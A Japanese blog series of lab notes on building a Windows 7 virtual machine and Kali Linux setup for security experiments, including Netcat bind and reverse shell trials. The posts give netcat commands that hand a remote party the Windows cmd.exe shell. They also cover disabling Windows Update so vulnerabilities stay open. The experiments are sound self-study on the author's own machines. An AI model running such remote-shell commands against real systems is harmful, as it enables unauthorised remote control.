Netcat 接続実験 その2

Netcat 接続実験 その2

Wndows7 と KaliLinux でリバースシェルの実験

KaliLinux で
ctrl + Alt +t で端末を起動

nc -lvp 5555


Netcat を待受状態で起動

また、別の端末を起動し

ifconfig

でIPアドレスを調べておく
inet と書かれている部分がIPアドレス

次に Windows7 で Command Prompt を起動し

cd C:Work
nc.exe 192.168.1.134 5555 -e cmd.exe

で nc で KaliLinux へ接続

すると KaliLinux 側の端末に Windows 7 のCommand Prompt が
表示される

これで

ipconfig

を実行すると Windows 7 のIPアドレスが表示される

なお、Windows7 側のCommand Prompt なので
他のコマンドなども使うことができる

接続終了するには
KaliLinux 側で exit を実行すればOK

Netcat 接続実験

Netcat 接続実験

Windows 7 試用版で
Command Prompt を開き

cd C:Work
nc.exe -lvp 5555

で netcat を起動

これに kaliLinux で接続できるか実験

本来はホストオンリーアダプタなどで実験するけど
設定がうまくできなかったので
ブリッジ接続で実験

IPは変動するので
Windows 側は

ipconfig 

でIPアドレスを把握

IPv4 Address の部分がIPアドレスになる
今回は
192.168.1.174

次に VirtualBox で KaliLinux を起動

ctrl + Alt + t で端末を起動し

nc 192.168.1.174 5555

で接続

すると
Windows 7 側で

netstat -an

を実行すると
5555ポートが ESTABLISHED になっていればOK

この状態で KaliLinux で hello と入力すると
Windows 側でも hello と表示される

また Windows 側で入力した
windows というメッセージも KaliLinux 側で表示される

なお Netcat を終了するには
ctrl + c でどちらかが接続を停止すると終了する

これを利用すれば
KaliLinux 側から
Windows の Command Prompt を操作することが可能

この実験をするために
Windows で Netcat をサーバとして起動させる
これには
-e オプションを使う

-e オプションで実行するプログラムを指定する

nc.exe -lvp 5555 -e cmd.exe

今回は Windows のシェルの cmd.exe を実行

これで KaliLinux で

nc 192.168.1.174 5555

で接続すると
Windows の Command Prompt が操作できるようになる

試しに Windows のファイル一覧を表示する dir コマンドを実行

すると現在のディレクトリの
Windowsのファイル一覧を表示することができる

なお終了するときには
KaliLinux 側で

exit 

を実行すればOK

なお、windows 側では
前回と異なり操作している状態が表示されない

この手法がバインドシェル
ただし、これだとファイアーウォールやルーターの影響を受ける

理由は外部から内部へのアクセスを制限しているため

Windows セキュリティの実験環境構築 その2

Windows セキュリティの実験環境構築 その2

仮想マシンでセキュリティの実験をするための構築

今回は Netcat
Windows7 試用版で使うために
Netcat for Windows をダウンロード

https://joncraton.org/blog/46/netcat-for-windows/
よりダウンロード可能

Download nc111nt.zip (password:nc) – Netcat for Windows
をクリックしてダウンロード

ダウンロードしたファイルを右クリック >
Extract All …

展開先を聞かれるので
今回は新規に作業ディレクトリを作ってから行うので
Make New Folder をクリック

これで Work というディレクトリを作成しOKをクリック

Extract をクリックするとここへ展開される

展開するときにパスワードを聞かれるので
nc を入力しOKをクリック

これで展開できるので
次に Command Prompt を起動し

cd C:Work

で展開先に cd コマンドで移動

nc.exe -h

を実行するとヘルプが表示される

次にポート5555で待ち受けるサーバーにする

nc.exe -lvp 5555

を実行

オプションに関しては
使いたいときに必ず忘れる便利なコマンド「nc」
https://ltside.com/kizyo/nc.html
を参考に

今回使用したオプションは
l 待受モード
v 情報を表示
p ポートを指定

というもの

実行すると
Windows Firewall が起動するので

Ptivate networks,such as my home or work network

Publick network such as those in airports and coffee shops( not recommended because these networks othen have little or no security)
にチェックを入れ
Allow access
をクリック

状態確認をしたいので
もうひとつ Command Prompt を開き

netstat -an

を実行

これで
5555ポートがLISTEN になっていればOK

なお、
Proto がプロトコル
Local Address がIPアドレス:ポート番号
Foreign Address が接続先のアドレス
State が状態

State が LISTEN なら待受状態になっている

Windows セキュリティの実験環境構築

Windows セキュリティの実験環境構築

Windows7 試用版に
Ssinternals Suite をインストール

これは
Windows トラブルシューティング ツール

https://docs.microsoft.com/ja-jp/previous-versions/bb842062%28v%3dmsdn.10%29
よりダウンロード可能らしいけど
ダウンロードしようとしても日本語版だとダウンロードできないので

英語版を
https://docs.microsoft.com/ja-jp/sysinternals/downloads/sysinternals-suite
からダウンロード

ダウンロードしたファイルを
VirtualBox の 仮想Windows マシンに
ドラッグドロップしたいので

VirtualBoxで
デバイス > ドラッグ&ドロップ >
双方向
として
あとはドラッグドロップすればOK

ファイル名は
SusinternalsSuite.zip

今回はデスクトップに配置
これを解凍するので
右クリック >  Extract all
で展開

これで Extract をクリックすればOK

これでデスクトップに
Sysinternal Suites が展開される

次に起動
Autoruns.exe
で起動

ライセンスに同意を求められるので
Agree をクリック

これで起動するときに
システムの各項目の取得をするので
起動には少し時間がかかる

なお Everythying タブには
自動起動関連の項目が表示されている

今後、どのように変化するか
ベースとなるファイルが必要なので
File > Save

ファイル名を
任意の名前で保存

_日付.arm
というように
日付などをいれるとログのようにわかりやすくなる

このファイルとの差分を調べることで
原因をさぐるのに役立つ

Windows7 仮想マシンの設定 その2

Windows7 仮想マシンの設定 その2

Windows7 試用版は
英語キーボードなので
日本語キーボードドライバーを適用する

スタートメニューで
devmgmt.msc
を入力し
デバイスマネージャを起動

Keyboards >
Standard PS/2 Keyboard
をクリック

Device タブの
Update Driver をクリック

Browse my conputer for driver software
をクリック

Let me pick from a list of device drivers on my computer
をクリック

Show cmpatible hardware
のチェックを外し

Manufacturerで
Standards keybords をクリックして

Model から
Japanese PS/2 (106/109 Key Ctrl + Eisuu)
を選択し
Next をクリック

Update Driver Warning の警告がでるけど
Yes をクリック

あとはダイアログがに従い close していくと
再起動するようにメッセージがでるので
yes をクリックすると
再起動されドライバーが適用される

しかし、このままだとキーボードは英語のままなので
システムの言語設定を日本語にする

スタートメニュー >
Control Panel で

Change display language をクリック

Administrative タブをクリックし
Change system locale.. をクリック

Japanese(Japane)
を選択しOKをクリック

設定を有効にするために
再起動するこを聞かれるけど
このままだとキーボードのデフォルトはENのままなので
デフォルトでJPになるように設定したいので
Cancel をクリック

Keyboards and Lanuages タブをクリックし
Change keyboards… をクリック

これで default input language を
Japanese(Japan) Microsoft IME にしてOKをクリック

あとは再起動して
JP となっていれば設定成功

Windows7 試用版のライセンス認証の猶予期間を延長

Windows7 試用版のライセンス認証の猶予期間を延長

Windows7 試用版は
ライセンス認証をしないと10日となっていて
これを超えると1時間で強制的にシャットダウンされる

猶予期間の確認には
Command Prompt を起動

slmgr /dlv
で確認ができる

Remaining Windows rearm count
がリセット可能回数

猶予期間のリセットには
slmgr /rearm

でできるらしいけど
Error:0xC004F025
Access Denied the requested action requires elevated privileges
となってしまう

このため
スタートメニューで Command Prompt を右クリック

Run as administrator

yes をクリック

これで
slmgr /rearm
を実行

これで再起動して
再度
slmgr /dlv
を実行すると
残り有効時間である Time remaining と

延長可能回数の Reamaining Windows rearm count
の回数が変わっているのが確認できる

Windows7 仮想マシンの設定

Windows7 仮想マシンの設定

セキュリティの実験をするために
Windows7 試用版をダウンロードし

VirtualBox へインポートしたので
設定を変更

デフォルトだと Ping を通さないので
これを変更

スタートメニューから
Control Panel > System and Security >
Windows Firewall

Advanced settings をクリック

Inbound Rules >
File and Printer Sharing(Echo Request- ICMPv4-In)
を右クリックし
Properties をクリック

General タブの Enabled にチェックをいれ
Apply をクリック

Windows7 のIPを調べるには
Command Prompt を起動し
ipconfig を実行すればIPアドレスが表示される

あとは Ubuntu から

ping -c 5 192.168.1.174

というように
ping コマンドに -c オプションをつけて
windows7 のIPへ実行すればOK

ping コマンドに関しては
pingコマンドについて詳しくまとめました 【Linuxコマンド集】

を参考に

次に Windows Update の停止
セキュリティの実験をするには
アップデートでセキュリティの脆弱性がなくなって実験できなくなるので停止しておく

Control Panel >
Ssystem and Security >
Wndows Update

Change settings をクリック

Important updates を
Never check for updates(not recommended)
にして
OKをクリック

これで Windows Update が停止される

あとはファイル共有機能や操作性向上のため
VirtualBox Gurest Additions を適用

デバイス >
Guest Additions CD イメージの挿入

Run VBox Windows Additions.exe
をクリック

Yes をクリックし
デフォルトのまま Next をクリックしていく

途中で必要なソフトのインストール画面になるので
Install をクリック

インストールが完了し
Finish をクリックすると再起動され
GuestAddiotions が適用される

virtualbox のアップデート

virtualbox のアップデート
VirtualBox その90 – VirtualBox 6.0.0がリリースされました

を参考に

sudo apt install virtualbox-6.0

で virtualbox を 5.2 系からアップデート

次に extension pack もアップデート

vboxmanage -v

で virtualbox のバージョン確認

6.0.10r132072
だったので

https://www.virtualbox.org/wiki/Downloads
から
All supported platforms
をクリックし
ファイルをダウンロード

ダウンロードが完了したら
右クリックして
Oracle VM Virtualbox で開く
を選択し

アップグレードをクリック

画面を下までスクロールし
同意しますをクリック

これでアップグレードされるけど

そのまま仮想マシンを起動しようとしてもエラーになってしまう

RTR3InitEx failed with rc=-1912 (rc=-1912)
で検索した結果

sudo apt autoremove --purge virtualbox*

で一度削除し
リポジトリ更新後に再インストールすればOK

sudo vim /etc/apt/sources.list

で設定ファイルを開き

deb https://download.virtualbox.org/virtualbox/debian xenial contrib

を追記

なおxenial の部分は
ubuntu のバージョンごとの
コードネームになるので
この部分は

 lsb_release -a | grep Codename

で調べることができる

 wget https://www.virtualbox.org/download/oracle_vbox_2016.asc
sudo apt-key add oracle_vbox_2016.asc


キーの取得と登録

sudo apt-get update
sudo apt-get install virtualbox-6.0

でリポジトリ更新後に
再度インストールすれば
無事に仮想マシンが起動

試用版 Windows 7

試用版 Windows 7

MicroSoft から試用版 Windows の仮想マシンが提供されている

ライセンス不要で60日利用可能
https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/
からダウンロード可能

Virtual machine

IE8 on Win7 (x86)
にして
select platform

Virtualbox
にして

DOWNLOAD ZIP
をクリック

ダウンロードが完了したら

unzip IE8.Win7.VirtualBox.zip 

で解凍して

VirtualBoxを起動し
ファイル > 仮想アプライアンスのインポート
でWindows7 の仮想マシンを指定し
インポート

これで
IE-8 Win7 を起動すれば
仮想マシンの Windows7 試用版が起動できる

なお使用できる期間は10日間で
リセット機能を使うことで延長ができる

リセット機能は5回使用できるため
トータルで使用できる期間は60日となる

Kali Linux 設定その3

Kali Linux 設定その3

man2html を入れることで
man をブラウザで参照できるようになる

terminal を開き

apt install man2html

でインストール

次にCGIの実行の有効化

a2enmod cgid

でccgid モジュールを組み込み

systemctl restart apache2

で Apache の再起動

これで KaliLinux の FireFox を起動
http://localhost/cgi-bin/man/man2html
へアクセスすると
ブラウザで man が使えるようになっている

続いてエイリアスの設定

エイリアスの設定には
alias コマンドを

エイリアスの削除には
unalias コマンドを使う

alias コマンドについては
新しいコマンドも作れる!aliasコマンド詳細まとめ【Linuxコマンド集】

を参考に

なお alias コマンドで設定しただけでは
ターミナルを閉じたときにリセットされてしまうので
.bash_aliases を作成し
ここへエイリアスを記述しておく

vim .bash_aliaces

でファイルを作成

alias ll='ls -l'

alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'

alias ..='cd ..'
alias rm='rm -i'

alias del='rm -i'

alias gs='git status'

alias powerup='apt update && apt-get upgrade -y && apt dist-upgrade && apt autoremove -y && apt autoclean -y'

として保存